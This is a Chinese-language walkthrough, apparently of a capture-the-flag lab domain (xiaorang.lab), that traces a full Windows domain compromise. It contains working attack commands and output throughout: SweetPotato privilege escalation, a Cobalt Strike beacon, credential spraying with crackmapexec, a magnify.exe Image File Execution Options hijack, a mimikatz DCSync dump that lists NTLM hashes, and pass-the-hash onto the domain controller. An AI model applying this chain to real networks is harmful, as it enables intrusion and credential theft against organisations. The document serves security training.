外网打点 fscan漏扫一下
MDUT数据库连接工具连接一下,没权限,上传一个甜土豆提权
内网打点 提示用户会话,先上线cs
shell query user || qwinsta
查看当前在线用户
尝试进程注入,成功获取,net use查看共享
下面有个凭证
开始收集内网信息,上传fscan
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 start infoscan (icmp) Target 172.22.8.18 is alive (icmp) Target 172.22.8.15 is alive (icmp) Target 172.22.8.31 is alive (icmp) Target 172.22.8.46 is alive [*] Icmp alive hosts len is: 4 172.22.8.15:88 open 172.22.8.18:1433 open 172.22.8.46:445 open 172.22.8.31:445 open 172.22.8.15:445 open 172.22.8.18:445 open 172.22.8.46:139 open 172.22.8.31:139 open 172.22.8.15:139 open 172.22.8.18:139 open 172.22.8.46:135 open 172.22.8.31:135 open 172.22.8.15:135 open 172.22.8.18:135 open 172.22.8.46:80 open 172.22.8.18:80 open [*] alive ports len is: 16 start vulscan [*] NetInfo [*]172.22.8.18 [->]WIN-WEB [->]172.22.8.18 [->]2001:0:348b:fb58:83f:175d:d89d:9280 [*] NetInfo [*]172.22.8.15 [->]DC01 [->]172.22.8.15 [*] NetInfo [*]172.22.8.31 [->]WIN19-CLIENT [->]172.22.8.31 [*] NetInfo [*]172.22.8.46 [->]WIN2016 [->]172.22.8.46 [*] NetBios 172.22.8.31 XIAORANG\WIN 19-CLIENT [*] NetBios 172.22.8.15 [+] DC:XIAORANG\DC 01 [*] WebTitle http://172.22.8.46 code:200 len:703 title:IIS Windows Server [*] NetBios 172.22.8.46 WIN2016.xiaorang.lab Windows Server 2016 Datacenter 14393 [*] WebTitle http://172.22.8.18 code:200 len:703 title:IIS Windows Server [+] mssql 172.22.8.18:1433:sa 1qaz!QAZ
1 2 3 4 1. 172.22.8.15 域控 2. 172.22.8.31 域内机器 3. 172.22.8.18 已拿下 4. 172.22.8.46 域内机器
同时搭建好隧道开始打内网,拿刚刚的账号密码去进行挨个尝试,利用kali上面的工具
1 2 3 4 5 6 7 8 9 10 ┌──(root㉿kali)-[/home/kali] └─# proxychains4 -q crackmapexec smb 172.22.8.0/24 -u 'Aldrich' -p 'Ald@rLMWuy7Z!# ' SMB 172.22.8.18 445 WIN-WEB [*] Windows Server 2016 Datacenter 14393 x64 (name:WIN-WEB) (domain:WIN-WEB) (signing:False) (SMBv1:True) SMB 172.22.8.15 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:xiaorang.lab) (signing:True) (SMBv1:False) SMB 172.22.8.18 445 WIN-WEB [-] WIN-WEB\Aldrich :Ald@rLMWuy7Z!# STATUS_ LOGON_ FAILURE SMB 172.22.8.46 445 WIN2016 [*] Windows 10 / Server 2016 Build 14393 x64 (name:WIN2016) (domain:xiaorang.lab) (signing:False) (SMBv1:False) SMB 172.22.8.31 445 WIN19-CLIENT [*] Windows 10 / Server 2019 Build 17763 x64 (name:WIN19-CLIENT) (domain:xiaorang.lab) (signing:False) (SMBv1:False) SMB 172.22.8.15 445 DC01 [-] xiaorang.lab\Aldrich :Ald@rLMWuy7Z!# STATUS_ PASSWORD_ EXPIRED SMB 172.22.8.46 445 WIN2016 [-] xiaorang.lab\Aldrich :Ald@rLMWuy7Z!# STATUS_ PASSWORD_ EXPIRED SMB 172.22.8.31 445 WIN19-CLIENT [-] xiaorang.lab\Aldrich :Ald@rLMWuy7Z!# STATUS_ PASSWORD_ EXPIRED
有些密码过期了,没关系直接改密码即可
1 proxychains4 impacket-changepasswd xiaorang.lab/Aldrich:'Ald@rLMWuy7Z!# '@172.22.8.15 -newpass 'Admin@666'
但是只有172.22.8.46这个可以登录
前面提示了镜像劫持,看看注册表权限
1 Get-Acl -path "HKLM:\SOFTWARE \Microsoft \Windows NT\CurrentVersion \Image File Execution Options" | fl *
登录进来的用户都可修改,我们利用放大镜提权
1 REG ADD "HKLM\SOFTWARE \Microsoft \Windows NT\CurrentVersion \Image File Execution Options\magnify .exe" /v Debugger /t REG_ SZ /d "C:\windows \system 32\cmd .exe"
type "C:\Users\Administrator\flag\flag02.txt"拿到第二个flag
然后我们做横向,先收集这台机器在域中的关系,利用bloodhound这个工具
可以看到这台机器也是一台域控机器,因此我们上传猕猴桃直接抓取hash
1 mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:xiaorang.lab /all /csv" "exit"
1 2 3 4 5 6 7 8 9 10 mimikatz(commandline) # lsadump::dcsync /domain:xiaorang.lab /all /csv [DC] 'xiaorang.lab' will be the domain [DC] 'DC01.xiaorang.lab' will be the DC server [DC] Exporting domain 'xiaorang.lab' 502 krbtgt 3ffd5b58b4a6328659a606c3ea6f9b63 514 1000 DC01$ ca4725b5186b3a6699d56662b7a9b7c2 532480 500 Administrator 2c9d81bdcf3ec8b1def10328a7cc2f08 512 1103 WIN2016$ a1fbbb8b692fc8bc39c97e6eee719a23 16781312 1104 WIN19-CLIENT$ c043da1da4cd586619bc02ff8940d654 16781312 1105 Aldrich c7c654da31ce51cbeecfef99e637be15 512
之后我kali的crackmapexec打·哈希传递
1 proxychains4 crackmapexec smb 172.22.8.15 -u administrator -H 2c9d81bdcf3ec8b1def10328a7cc2f08 -d xiaorang.lab -x "type Users\Administrator \flag \flag 03.txt"
域控,拿到第三个flag
